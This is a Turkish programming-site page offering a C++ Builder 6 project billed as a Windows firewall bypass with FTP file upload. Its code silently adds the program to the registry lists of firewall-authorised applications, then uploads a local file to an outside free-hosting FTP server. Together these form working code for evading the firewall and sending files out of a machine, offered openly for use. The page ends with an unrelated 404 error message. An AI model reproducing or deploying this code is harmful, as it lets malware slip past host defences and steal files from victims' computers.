Programlama | Programlama Dilleri | C Programlama Dili |C++

Anasayfa Programlama C++ Builder Windows Güvenlik Duvar? Bypass ve FTP Upload


Windows Güvenlik Duvar? Bypass ve FTP Upload

AÇIKLAMA

Bu program C++ Builder 6 projesidir. Bu program sayesinde programlar?n?z windowsun güvenlik duvar?na tak?lmadan d??ar?ya (internete) aç?labilirsiniz. Ayr?ca içindeki bir ba?ka kod yard?m?yla bilgisayar içindeki dosyalar? ftp protokolünü kullanarak herhangi bir domain'e gönderebilirsiniz.Programda kullan?lan domain free olup ftp deste?i sa?lamaktad?r. Upload kodunda dikkat edilmesi gereken nokta uzak bilgisayardaki klasör yap?s?na göre kodu ayarlamak olacakt?r.

Program?n tam olarak çal??abilmesi için exe dosyas?n?n bulundu?u klasörün belirtilen yolda olmas? gerekir. 

Program?n Tamam?n? A?a??daki Linkten ?ndirebilirsiniz

Linki Görebilmeniz ?çin Üye Olman?z Gerekmektedir...

Üye Kay?t

Program Kodu:

 1. //---------------------------------------------------------------------------
 2.  
 3. #include <vcl.h>
 4. #pragma hdrstop
 5.  
 6. #include "Unit1.h"
 7. #include "Registry.hpp"
 8. //---------------------------------------------------------------------------
 9. #pragma package(smart_init)
 10. #pragma resource "*.dfm"
 11. TForm1 *Form1;
 12. //---------------------------------------------------------------------------
 13. __fastcall TForm1::TForm1(TComponent* Owner)
 14.         : TForm(Owner)
 15. {
 16. }
 17. //---------------------------------------------------------------------------
 18.  
 19. void __fastcall TForm1::Button1Click(TObject *Sender)
 20. {
 21. TRegistry *Reg= new TRegistry;
 22. Reg->RootKey=HKEY_LOCAL_MACHINE;
 23. String yol="SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
 24. if(Reg->OpenKey(yol,true))
 25. {
 26.  Reg->WriteString("C:\\Program Files\\Borland\\CBuilder6\\Projects\\Windows Duvar ?ptal+Upload\\Project1.exe","C:\\Program Files\\Borland\\CBuilder6\\Projects\\Windows Duvar ?ptal+Upload\\Project1.exe:*:Enabled:Project1");
 27.  Reg->CloseKey();
 28. }
 29. Reg->RootKey=HKEY_LOCAL_MACHINE;
 30. yol="SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\\AuthorizedApplications\\List";
 31. if(Reg->OpenKey(yol,true))
 32. {
 33.   Reg->WriteString("C:\\Program Files\\Borland\\CBuilder6\\Projects\\Windows Duvar ?ptal+Upload\\Project1.exe","C:\\Program Files\\Borland\\CBuilder6\\Projects\\Windows Duvar ?ptal+Upload\\Project1.exe:*:Enabled:Project1");
 34.  Reg->CloseKey();
 35. }
 36. }
 37. //---------------------------------------------------------------------------
 38. void __fastcall TForm1::Button2Click(TObject *Sender)
 39. {
 40. NMFTP1->Connect();
 41. NMFTP1->Upload("gonderiyorum.txt","//programhazir.freehostia.com//bilgi.txt");
 42. NMFTP1->Disconnect();
 43. }
 44. //---------------------------------------------------------------------------
 45.  

Yorumlar (0)
Sadece kayıtlı kullanıcılar yorum yazabilir!
Son Güncelleme ( Perşembe, 07 Nisan 2011 21:40 )  
404 Not Found

Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.